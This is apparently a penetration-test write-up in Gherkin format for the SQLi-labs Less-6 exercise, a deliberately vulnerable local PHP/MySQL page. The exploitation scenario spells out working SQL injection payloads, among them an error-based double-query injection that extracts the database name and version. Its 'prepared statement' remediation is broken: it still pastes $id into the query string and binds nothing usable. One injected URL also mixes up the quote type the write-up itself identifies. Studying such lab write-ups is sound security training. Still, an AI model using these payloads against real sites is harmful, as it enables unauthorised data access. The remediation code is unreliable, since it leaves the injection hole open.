## Version 1.4.1
## language: en

Feature:
  TOE:
    SQLI-labs
  Category:
    SQL Injection - GET-Double Injection - Double Quotes- String
  Location:
    http://localhost/sqlilabs/Less-6/ - id(field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Verify if the site is vulnerable to SQL Injection
  Recommendation:
    Use Prepared Statements

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 19.10       |
    | Firefox         | 72.0.2      |
  TOE information:
    Given I access the main page
    And the page is made with PHP
    And MySQL is the Database Management System
    And the website is running in localhost

  Scenario: Normal use case
    When I access the page
    Then a message is displayed at the center of the screen
    """
    Please input the ID as parameter with numeric value
    """
    When I enter the ID parameter as "?id=1"
    Then a new message appears
    """
    You are in...........
    """

  Scenario: Static detection
    Given I access the backend code at
    """
    https://github.com/Audi-1/sqli-labs/blob/master/Less-6/index.php
    """
    When I check the source code
    Then I find a query related to the id parameter
    """
    $id = '"'.$id.'"';
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    """
    And the variable "$sql" is storing a query string
    When there aren't prepared statements in the code
    And the query is stored as a single string
    Then the id parameter is vulnerable to SQL injection

  Scenario: Dynamic detection
    Given I access the website
    When I enter the id parameter of the URL using a double quote ("")
    Then I get an error message from the database
    """
    You have an error in your SQL syntax; check the manual that corresponds to
    your MySQL server version for the right syntax to use near '""""
    LIMIT 0,1' at line 1
    """
    When the query's interpretation is broken by my input in the URL
    Then the site is vulnerable to SQL Injection
    And I realize the page is vulnerable to SQL injection

  Scenario: Exploitation
    When I enter the next string in the url
    """
    id=1" AND 1=1 --+
    """
    Then the query is not generating errors
    """
    id=1"--+
    """
    When I try to enter a union based injection into the query
    """
    ?id=-1" union select 1,2,3 --+
    """
    Then the website doesn't display new information
    """
    You are in...........
    """
    When I open the MYSQL Command Line
    Then I write my attack based on a main query
    """
    select count(*), floor(rand()*2)a from table_name group by a
    """
    And sometimes I get "duplicate entry error" from the query result
    And I realize I can get sensitive information form that error
    When I want to get the database name and version
    Then I modify the basic query by using the DB information schema
    And It is necessary to concatenate the data inside the query
    """
    select count(*),concat((select database()),'--',floor(rand()*2))a
    from information_schema.tables group by a
    """
    When I think the query could return more than one column
    Then the injection might fail
    And I have to use the main query as a subquery for another selection
    When I rewrite the attack by selecting 1 column from the main query
    """
    select 1 from(select count(*),concat((select database()),
    '--',(select version()),'--',floor(rand()*2))a from
    information_schema.tables group by a)b
    """
    Then I can inject it
    """
    ?id=1' and (select 1 from(select count(*),concat((select database()),
    '--',(select version()),'--',floor(rand()*2))a from
    information_schema.tables group by a)b)--+
    """
    And the query result return "Subquery returns more than 1 row"
    When I reload the site
    Then I get the database name and the MYSQL version [evidence](evidence.png)

  Scenario: Remediation
    When the application is executing queries in MySQL
    Then the query code must use prepared statements
    """
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE id='$id' LIMIT 0,1")

    $id = $_POST['id']
    $stmt->bind_param("i", $id)

    $stmt->execute()
    """
    And the code can prevent SQL Injection

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (Medium) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    6.2/10 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.9/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L

  Scenario: Correlations
  No correlations have been found to this date 2020-02-24
